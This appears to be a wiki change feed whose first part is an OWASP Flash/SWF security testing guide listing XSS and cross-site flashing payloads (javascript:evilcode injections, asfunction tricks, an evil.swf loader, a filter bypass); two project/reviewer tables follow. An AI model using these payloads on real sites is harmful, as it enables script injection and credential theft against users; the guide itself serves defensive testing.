&amp;lt;pre&amp;gt;&lt;br /&gt;
  movieClip 328 __Packages.Locale {&lt;br /&gt;
&lt;br /&gt;
    #initclip&lt;br /&gt;
      if (!_global.Locale) {&lt;br /&gt;
        var v1 = function (on_load) {&lt;br /&gt;
          var v5 = new XML();&lt;br /&gt;
          var v6 = this;&lt;br /&gt;
          v5.onLoad = function (success) {&lt;br /&gt;
            if (success) {&lt;br /&gt;
              trace('Locale loaded xml');&lt;br /&gt;
              var v3 = this.xliff.file.body.$trans_unit;&lt;br /&gt;
              var v2 = 0;&lt;br /&gt;
              while (v2 &amp;lt; v3.length) {&lt;br /&gt;
                Locale.strings[v3[v2]._resname] = v3[v2].source.__text;&lt;br /&gt;
                ++v2;&lt;br /&gt;
              }&lt;br /&gt;
              on_load();&lt;br /&gt;
            } else {}&lt;br /&gt;
          };&lt;br /&gt;
          if (_root.language != undefined) {&lt;br /&gt;
            Locale.DEFAULT_LANG = _root.language;&lt;br /&gt;
          }&lt;br /&gt;
          v5.load(Locale.DEFAULT_LANG + '/player_' +&lt;br /&gt;
                              Locale.DEFAULT_LANG + '.xml');&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Could be attacked by requesting:&lt;br /&gt;
&lt;br /&gt;
 http://victim/file.swf?language=http://evil&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Unsafe Methods ===&lt;br /&gt;
&lt;br /&gt;
When an entry point is identified the data it represents could be used by unsafe methods.&lt;br /&gt;
If the data is not filtered/validated using the right regexp it could lead to some security issue.&lt;br /&gt;
&lt;br /&gt;
Unsafe Methods since version r47 are:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
loadVariables()&lt;br /&gt;
loadMovie()&lt;br /&gt;
getURL()&lt;br /&gt;
loadMovie()&lt;br /&gt;
loadMovieNum()&lt;br /&gt;
FScrollPane.loadScrollContent()&lt;br /&gt;
LoadVars.load &lt;br /&gt;
LoadVars.send &lt;br /&gt;
XML.load ( 'url' )&lt;br /&gt;
LoadVars.load ( 'url' ) &lt;br /&gt;
Sound.loadSound( 'url' , isStreaming ); &lt;br /&gt;
NetStream.play( 'url' );&lt;br /&gt;
&lt;br /&gt;
flash.external.ExternalInterface.call(_root.callback)&lt;br /&gt;
&lt;br /&gt;
htmlText&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== The Test ===&lt;br /&gt;
&lt;br /&gt;
In order to exploit a vulnerability the swf file should be hosted on the victim host, and&lt;br /&gt;
the techniques of reflected Xss must be used.&lt;br /&gt;
That is forcing the browser to load a pure swf file directly in the location bar &lt;br /&gt;
( by redirection or social engineering) or by loading it through an iframe from an evil page:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;iframe src='http://victim/path/to/file.swf'&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is because in this situation the browser will self generate a Html page as if it were hosted &lt;br /&gt;
by the victim host.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Xss ===&lt;br /&gt;
&lt;br /&gt;
'''GetURL:'''&lt;br /&gt;
&lt;br /&gt;
GetURL Function lets the movie to load a URI into Browser's Window. &lt;br /&gt;
So if an undefined variable is used as first argument for getURL:&lt;br /&gt;
&lt;br /&gt;
 getURL(_root.URI,'_targetFrame');&lt;br /&gt;
&lt;br /&gt;
This means it's possible to call javascript in the same domain where the movie is hosted by &lt;br /&gt;
requesting:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 http://victim/file.swf?URI=javascript:evilcode&lt;br /&gt;
&lt;br /&gt;
 getURL('javascript:evilcode','_self');&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The same when only some part of getURL is controlled:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 Dom Injection with Flash javascript injection&lt;br /&gt;
 &lt;br /&gt;
	getUrl('javascript:function('+_root.arg+')) &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''asfunction:'''&lt;br /&gt;
&lt;br /&gt;
&amp;quot;You can use the special asfunction protocol to cause &lt;br /&gt;
 the link to execute an ActionScript function in a SWF file &lt;br /&gt;
 instead of opening a URL...&amp;quot; ( Adobe.com )&lt;br /&gt;
&lt;br /&gt;
Until release r48 of Flash player asfunction could be used on every method which has a url&lt;br /&gt;
as argument.&lt;br /&gt;
&lt;br /&gt;
This means that a tester could try to inject:&lt;br /&gt;
&lt;br /&gt;
 asfunction:getURL,javascript:evilcode&lt;br /&gt;
&lt;br /&gt;
in every unsafe method like:&lt;br /&gt;
&lt;br /&gt;
 loadMovie(_root.URL)&lt;br /&gt;
&lt;br /&gt;
by requesting:&lt;br /&gt;
&lt;br /&gt;
 http://victim/file.swf?URL=asfunction:getURL,javascript:evilcode&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''ExternalInterface:'''&lt;br /&gt;
&lt;br /&gt;
ExternalInterface.call is a static method introduced by adobe to improve player/browser interaction.&lt;br /&gt;
&lt;br /&gt;
From a security point of view it could be abused when part of its argument could be controlled:&lt;br /&gt;
&lt;br /&gt;
 flash.external.ExternalInterface.call(_root.callback);&lt;br /&gt;
 &lt;br /&gt;
the attack pattern for this kind of flaw should be something like the following:&lt;br /&gt;
eval(evilcode)&lt;br /&gt;
&lt;br /&gt;
since the internal javascript which is executed by the browser will be something similar to:&lt;br /&gt;
&lt;br /&gt;
 eval('try { __flash__toXML('+__root.callback+') ; } catch (e) { &amp;quot;&amp;lt;undefined/&amp;gt;&amp;quot;; }')&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Html Injection ===&lt;br /&gt;
&lt;br /&gt;
TextField Objects can render minimal Html by setting:&lt;br /&gt;
&lt;br /&gt;
 tf.html = true&lt;br /&gt;
 tf.htmlText = '&amp;lt;tag&amp;gt;text&amp;lt;/tag&amp;gt;'&lt;br /&gt;
&lt;br /&gt;
So if some part of text could be controlled by the tester, an a tag or a img tag could be &lt;br /&gt;
injected resulting in modifying the GUI or Xss the browser.&lt;br /&gt;
&lt;br /&gt;
Some Attack Example with A Tag:&lt;br /&gt;
&lt;br /&gt;
* Direct XSS: &amp;lt;a href='javascript:alert(123)' &amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Call AS function: &amp;lt;a href='asfunction:function,arg' &amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Call Swf public functions: &lt;br /&gt;
    &amp;lt;a href='asfunction:_root.obj.function, arg'&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Call Native Static AS Function:&lt;br /&gt;
&amp;lt;a href='asfunction:System.Security.allowDomain,evilhost' &amp;gt;&lt;br /&gt;
&lt;br /&gt;
Img tag could be used as well:&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;img src='http://evil/evil.swf' &amp;gt;&lt;br /&gt;
* &amp;lt;img src='javascript:evilcode//.swf' &amp;gt; (.swf is necessary to bypass flash player internal filter)&lt;br /&gt;
&lt;br /&gt;
Note: since release 124 of Flash player Xss is no more exploitable, but GUI modification could still &lt;br /&gt;
be accomplished.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Flashing ===&lt;br /&gt;
&lt;br /&gt;
Cross Site Flashing (XSF) is a vulnerability which has a similar impact than with Xss.&lt;br /&gt;
XSF Occurs when from different domains:&lt;br /&gt;
One Movie loads another Movie with loadMovie* functions &lt;br /&gt;
or other hacks and has access to the same sandbox or part of it&lt;br /&gt;
XSF could also occurs when an HTML page uses JavaScript&lt;br /&gt;
to command a Macromedia Flash movie, for example, by calling:&lt;br /&gt;
 GetVariable: access to flash public and static object&lt;br /&gt;
 from javascript as a string.&lt;br /&gt;
 SetVariable: set a static or public flash object to a new &lt;br /&gt;
 string value from javascript.&lt;br /&gt;
 Or other scripting method.&lt;br /&gt;
Unexpected Browser to swf communication could result in stealing data from swf application.&lt;br /&gt;
&lt;br /&gt;
It could be perfomed by forcing a flawed swf to load an external evil flash file.&lt;br /&gt;
&lt;br /&gt;
This attack could result in Xss or in the modification of the GUI in order to fool a user to &lt;br /&gt;
insert credentials on a fake flash form.&lt;br /&gt;
&lt;br /&gt;
XSF could be used in presence of Flash Html Injection or external swf files when loadMovie*&lt;br /&gt;
methods are used.&lt;br /&gt;
&lt;br /&gt;
=== Attacks and Flash Player Version ===&lt;br /&gt;
&lt;br /&gt;
Since May 2007 three new versions of Flash player were released by Adobe.&lt;br /&gt;
Every new version restricts some of the attacks previously described.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
| Attack         | asfunction | ExternalInterface | GetURL  | Html Injection | &lt;br /&gt;
| Player Version |&lt;br /&gt;
| v9.0 r47/48    |  Yes       |   Yes             | Yes     |     Yes        |&lt;br /&gt;
| v9.0 r115      |  No        |   Yes             | Yes     |     Yes        |&lt;br /&gt;
| v9.0 r124      |  No        |   Yes             | Yes     |     Partially  |&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cross Site Scripting and Cross Site Flashing are the expected results on a flawed SWF file.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Testing Flash Applications: A new attack vector for XSS and XSFlashing: http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt&lt;br /&gt;
&lt;br /&gt;
* Finding Vulnerabilities in Flash Applications: http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt&lt;br /&gt;
&lt;br /&gt;
* Adobe Security: http://www.adobe.com/devnet/flashplayer/articles/flash_player9_security_update.html&lt;br /&gt;
&lt;br /&gt;
* Securing SWF Applications: http://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html&lt;br /&gt;
&lt;br /&gt;
* The Flash Player Development Center Security Section: http://www.adobe.com/devnet/flashplayer/security.html&lt;br /&gt;
&lt;br /&gt;
* The Flash Player 9.0 Security Whitepaper: http://www.adobe.com/devnet/flashplayer/articles/flash_player_9_security.pdf&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* SWFIntruder: https://www.owasp.org/index.php/Category:SWFIntruder&lt;br /&gt;
&lt;br /&gt;
* Decompiler – Flare: http://www.nowrap.de/flare.html&lt;br /&gt;
&lt;br /&gt;
* Compiler – MTASC: &amp;lt;http://www.mtasc.org/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Disassembler – Flasm: &amp;lt;http://flasm.sourceforge.net/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Swfmill – Convert Swf to XML and vice versa: &amp;lt;http://swfmill.org/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Debugger Version of Flash Plugin/Player: &amp;lt;http://www.adobe.com/support/flash/downloads.html&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Project_Information:Webekci&amp;diff=33433</id>
		<title>Project Information:Webekci</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Project_Information:Webekci&amp;diff=33433"/>
				<updated>2008-07-04T16:32:22Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| style=&amp;quot;width:100%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;7&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot;|&amp;lt;font color=&amp;quot;white&amp;quot;&amp;gt;'''PROJECT IDENTIFICATION''' &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|'''Project Name'''&lt;br /&gt;
 | colspan=&amp;quot;6&amp;quot; style=&amp;quot;width:85%; background:#cccccc&amp;quot; align=&amp;quot;left&amp;quot;|&amp;lt;font color=&amp;quot;black&amp;quot;&amp;gt;'''WeBekci''' &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;| '''Short Project Description''' &lt;br /&gt;
 | colspan=&amp;quot;6&amp;quot; style=&amp;quot;width:85%; background:#cccccc&amp;quot; align=&amp;quot;left&amp;quot;|WeBekci tries to provide an admin panel that ModSecurity, which is an open source web application firewall that runs as an Apache module, lacks. &amp;lt;br&amp;gt; Web application firewalls (WAF) are gaining importance among the information security technologies designed to protect web sites from attack. WAF solutions prevent attacks that network firewalls and intrusion detection systems can't and they require no modification of application source code. ModSecurity is an embeddable web application firewall and it provides protection from a range of attacks against web applications. It is an open source project available to everyone; it however does not come with an admin panel. &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|'''Email Contacts'''&lt;br /&gt;
 | style=&amp;quot;width:14%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|Project Leader&amp;lt;br&amp;gt;[mailto:bunyamin(at)owasp.org '''Bünyamin Demir''']&lt;br /&gt;
 | style=&amp;quot;width:14%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|Project Contributors&amp;lt;br&amp;gt;[mailto:urgunb(at)hotmail.com '''Bedirhan Urgun''']&amp;lt;br&amp;gt;[mailto:christophe(at)vandeplas.com '''Christophe Vandeplas''']&amp;lt;br&amp;gt;[mailto:serrano.neves(at)gmail.com '''Eduardo Jorge'''] &lt;br /&gt;
 | style=&amp;quot;width:14%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|[https://lists.owasp.org/mailman/listinfo/owasp-webekci '''Mailing List/subscribe''']&amp;lt;br&amp;gt;[mailto:Owasp-webekci@lists.owasp.org '''Mailing List/Use''']&lt;br /&gt;
 | style=&amp;quot;width:14%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|First Reviewer&amp;lt;br&amp;gt;[mailto:afry(at)strongcrypto.biz '''Alex Fry''']&amp;lt;br&amp;gt;[http://www.linkedin.com/in/alexanderfry Profile]&lt;br /&gt;
 | style=&amp;quot;width:14%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|Second Reviewer&amp;lt;br&amp;gt;[mailto:stefano.dipaola(at)@wisec.it '''Stefano Di Paola''']&amp;lt;br&amp;gt;[[User:Wisec|Profile]]&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|OWASP Board Member&amp;lt;br&amp;gt;(if applicable)&amp;lt;br&amp;gt;[mailto:name(at)name '''Name&amp;amp;Email''']&lt;br /&gt;
 |}&lt;br /&gt;
{| style=&amp;quot;width:100%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;6&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot;|&amp;lt;font color=&amp;quot;white&amp;quot;&amp;gt;'''PROJECT MAIN LINKS''' &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:100%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|&lt;br /&gt;
* WeBekci is a web based ModSecurity 2.x management tool and written in PHP with it's backend powered by MySQL. It can be found at [http://code.google.com/p/webekci/ WeBekci.]&lt;br /&gt;
* (If appropriate, links to be added)&lt;br /&gt;
 |}&lt;br /&gt;
{| style=&amp;quot;width:100%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;6&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot;|&amp;lt;font color=&amp;quot;white&amp;quot;&amp;gt;'''SPONSORS &amp;amp; GUIDELINES''' &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:50%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|[[OWASP Summer of Code 2008|Sponsor - '''OWASP Summer of Code 2008''']] &lt;br /&gt;
 | style=&amp;quot;width:50%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|[[OWASP Summer of Code 2008 Applications - Need Futher Clarifications#OWASP-WeBekci_Project|'''Sponsored Project/Guidelines/Roadmap''']]&lt;br /&gt;
 |}&lt;br /&gt;
{| style=&amp;quot;width:100%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;5&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot;|ASSESSMENT AND REVIEW PROCESS&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#6C82B5&amp;quot; align=&amp;quot;center&amp;quot;|'''Review/Reviewer''' &lt;br /&gt;
 | style=&amp;quot;width:21%; background:#b3b3b3&amp;quot; align=&amp;quot;center&amp;quot;|'''Author's Self Evaluation'''&amp;lt;br&amp;gt;(applicable for Alpha Quality &amp;amp; further) &lt;br /&gt;
 | style=&amp;quot;width:21%; background:#b3b3b3&amp;quot; align=&amp;quot;center&amp;quot;|'''First Reviewer'''&amp;lt;br&amp;gt;(applicable for Alpha Quality &amp;amp; further)&lt;br /&gt;
 | style=&amp;quot;width:21%; background:#b3b3b3&amp;quot; align=&amp;quot;center&amp;quot;|'''Second Reviewer'''&amp;lt;br&amp;gt;(applicable for Beta Quality &amp;amp; further)&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#b3b3b3&amp;quot; align=&amp;quot;center&amp;quot;|'''OWASP Board Member'''&amp;lt;br&amp;gt;(applicable just for Release Quality) &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|'''50% Review''' &lt;br /&gt;
 | style=&amp;quot;width:21%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot;|Objectives &amp;amp; Deliveries reached?&amp;lt;br&amp;gt;'''Yes/No''' (To update)&amp;lt;br&amp;gt;---------&amp;lt;br&amp;gt;[[Project Information:Webekci - 50 Review - Self Evaluation - A|See&amp;amp;Edit: 50% Review/Self-Evaluation (A)]]&lt;br /&gt;
 | style=&amp;quot;width:21%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot;|Objectives &amp;amp; Deliveries reached?&amp;lt;br&amp;gt;'''Yes/No''' (To update)&amp;lt;br&amp;gt;---------&amp;lt;br&amp;gt;[[Project Information:Webekci - 50 Review - First Reviewer - C|See&amp;amp;Edit: 50% Review/1st Reviewer (C)]]&lt;br /&gt;
 | style=&amp;quot;width:21%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot;|Objectives &amp;amp; Deliveries reached?&amp;lt;br&amp;gt;'''Yes/No''' (To update)&amp;lt;br&amp;gt;---------&amp;lt;br&amp;gt;[[Project Information:Webekci 50 Review Second Review E|See&amp;amp;Edit: 50%Review/2nd Reviewer (E)]]&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot;|X &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|'''Final Review''' &lt;br /&gt;
 | style=&amp;quot;width:21%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot;|Objectives &amp;amp; Deliveries reached?&amp;lt;br&amp;gt;'''Yes/No''' (To update)&amp;lt;br&amp;gt;---------&amp;lt;br&amp;gt;What status has been reached?&amp;lt;br&amp;gt;'''Season of Code''' - (To update)&amp;lt;br&amp;gt;---------&amp;lt;br&amp;gt;[[Project Information:Webekci - Final Review - Self Evaluation - B|See&amp;amp;Edit: Final Review/SelfEvaluation (B)]]&lt;br /&gt;
 | style=&amp;quot;width:21%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot;|Objectives &amp;amp; Deliveries reached?&amp;lt;br&amp;gt;'''Yes/No''' (To update)&amp;lt;br&amp;gt;---------&amp;lt;br&amp;gt;What status has been reached?&amp;lt;br&amp;gt;'''Season of Code''' - (To update)&amp;lt;br&amp;gt;---------&amp;lt;br&amp;gt;[[Project Information:Webekci - Final Review - First Reviewer - D|See&amp;amp;Edit: Final Review/1st Reviewer (D)]]&lt;br /&gt;
 | style=&amp;quot;width:21%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot;|Objectives &amp;amp; Deliveries reached?&amp;lt;br&amp;gt;'''Yes/No''' (To update)&amp;lt;br&amp;gt;---------&amp;lt;br&amp;gt;What status has been reached?&amp;lt;br&amp;gt;'''Season of Code''' - (To update)&amp;lt;br&amp;gt;---------&amp;lt;br&amp;gt;[[Project Information:Webekci - Final Review - Second Reviewer - F|See&amp;amp;Edit: Final Review/2nd Reviewer (F)]]&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot;|Objectives &amp;amp; Deliveries reached?&amp;lt;br&amp;gt;'''Yes/No'''(To update)&amp;lt;br&amp;gt;---------&amp;lt;br&amp;gt;Which status has been reached?&amp;lt;br&amp;gt;'''Season of Code'''(To update)&amp;lt;br&amp;gt;---------&amp;lt;br&amp;gt;[[Project Information:Webekci - Final Review - OWASP Board Member - G|See/Edit: Final Review/Board Member&amp;lt;br&amp;gt; (G)]]&lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Summer_of_Code_2008_Projects_Authors_Status_Target_and_Reviewers&amp;diff=33432</id>
		<title>OWASP Summer of Code 2008 Projects Authors Status Target and Reviewers</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Summer_of_Code_2008_Projects_Authors_Status_Target_and_Reviewers&amp;diff=33432"/>
				<updated>2008-07-04T16:24:59Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* TOOLS PROJECTS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page contains Projects, Authors, Status Target and Reviewers of the sponsored programme [[OWASP Summer of Code 2008]].&amp;lt;br&amp;gt;&lt;br /&gt;
'''* Please note: The reviewers with the reference ‘Confirmed’ were only confirmed by projects’ authors and are still waiting for OWASP Board confirmation.'''&lt;br /&gt;
&lt;br /&gt;
== DOCUMENTATION PROJECTS ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align:center&amp;quot;&lt;br /&gt;
! width=&amp;quot;600&amp;quot; height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | Application&lt;br /&gt;
! width=&amp;quot;220&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Author'''&lt;br /&gt;
! width=&amp;quot;60&amp;quot; align=&amp;quot;CENTER&amp;quot; | [[:Category:OWASP Project Assessment|'''Status Target''']]&lt;br /&gt;
! width=&amp;quot;108&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''1st&amp;lt;br&amp;gt;Reviewer'''&lt;br /&gt;
! width=&amp;quot;108&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''2nd&amp;lt;br&amp;gt;Reviewer '''&lt;br /&gt;
! width=&amp;quot;108&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''OWASP&amp;lt;br&amp;gt;Board&amp;lt;br&amp;gt;Reviewer&lt;br /&gt;
'''&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Application Security Verification Standard Project|OWASP Application Security Verification Standard]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Mike Boberski &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:jeff.williams(at)owasp.org Jeff Williams]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:pierre.parrend(at)insa-lyon.fr Pierre Parrend]&amp;lt;br&amp;gt;[http://www.rzo.free.fr Curriculum]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP AppSensor Project|OWASP AppSensor - Detect and Respond to Attacks from Within the Application]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:michael.coates(at)aspectsecurity.com Michael Coates]&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:eric.sheridan(at)aspectsecurity.com Eric Sheridan]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:thrynn404(at)gmail.com Randy Janinda]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Backend Security Project|OWASP Backend Security Project]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Carlo Pelliccioni&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:kisero(at)gmail.com Esteban Ribičić]&amp;lt;br&amp;gt;[http://docs.google.com/Doc?id=df9vbj96_120fzfj4kfk Curriculum]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | JS&amp;lt;br&amp;gt;(TBC)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Classic ASP Security Project|OWASP Classic ASP Security Project]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Juan Carlos Calderon&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:kisero(at)gmail.com Esteban Ribičić]&amp;lt;br&amp;gt;[http://docs.google.com/Doc?id=df9vbj96_120fzfj4kfk Curriculum]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:andres(at)neurofuzz.com Andres Andreu]&amp;lt;br&amp;gt;(TBC)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Code Review Project|OWASP Code review guide, V1.1]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Eoin Keary&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Quality&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:rahim.jina@ie.ey.com Rahim Jina]&amp;lt;br&amp;gt;[[OWASP Summer of Code 2008 Projects Authors Status Target and Reviewers Rahim Jina Curriculum|Curriculum]]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:psatishkumar(at)gmail.com P.Satish Kumar]&amp;lt;br&amp;gt;[https://www.owasp.org/index.php/User:Satishkumar  Curriculum]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Jeff Williams&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:OWASP Corporate Application Security Rating Guide|OWASP Corporate Application Security Rating Guide]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Parvathy Iyer&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Quality&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:nkirschner@eisnerllp.com Neal Kirschner]&amp;lt;br&amp;gt;[[OWASP Summer of Code 2008 Projects Authors Status Target and Reviewers Neal Kirschner Curriculum|Curriculum]]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
